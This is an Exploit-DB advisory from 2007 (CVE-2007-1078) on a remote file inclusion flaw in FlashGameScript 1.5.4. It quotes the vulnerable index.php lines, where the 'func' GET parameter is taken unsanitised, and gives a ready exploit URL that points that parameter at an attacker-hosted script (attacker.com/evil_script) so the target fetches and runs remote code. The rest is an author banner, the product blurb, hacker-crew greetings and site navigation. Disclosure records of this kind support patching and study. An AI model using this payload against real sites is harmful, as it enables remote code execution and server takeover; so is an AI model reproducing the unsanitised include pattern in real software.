FlashGameScript 1.5.4 - 'index.php?func' Remote File Inclusion

EDB-ID:

3360

CVE:

2007-1078

EDB Verified:

Author:

JuMp-Er

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-02-22

Vulnerable App:

         ___ ___                                        
_____   /   |   \            ___________   ______  _  __
\__  \ /    ~    \  ______ _/ ___\_  __ \_/ __ \ \/ \/ /
 / __ \\    Y    / /_____/ \  \___|  | \/\  ___/\     / 
(____  /\___|_  /           \___  >__|    \___  >\/\_/  
     \/       \/                \/            \/        


--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
contact:	: aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version		:1.5.4
URL:		:http://www.flashgamescript.com/
Price:		:$60
Description :
FlashGameScript: Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner.s profit with additional plug-in for alternative income opportunities.
-------------------------------------------------------


Vulnerability:
---------------
	     line 27: $absolutepath = $cfg[absolutepath];
at index.php line 28: $func =$_GET[func];
	     line 29: $pluginpath = $instdir."admin/plugins/";
---------------
Exploit:

http://www.somesite.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew

# milw0rm.com [2007-02-22]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services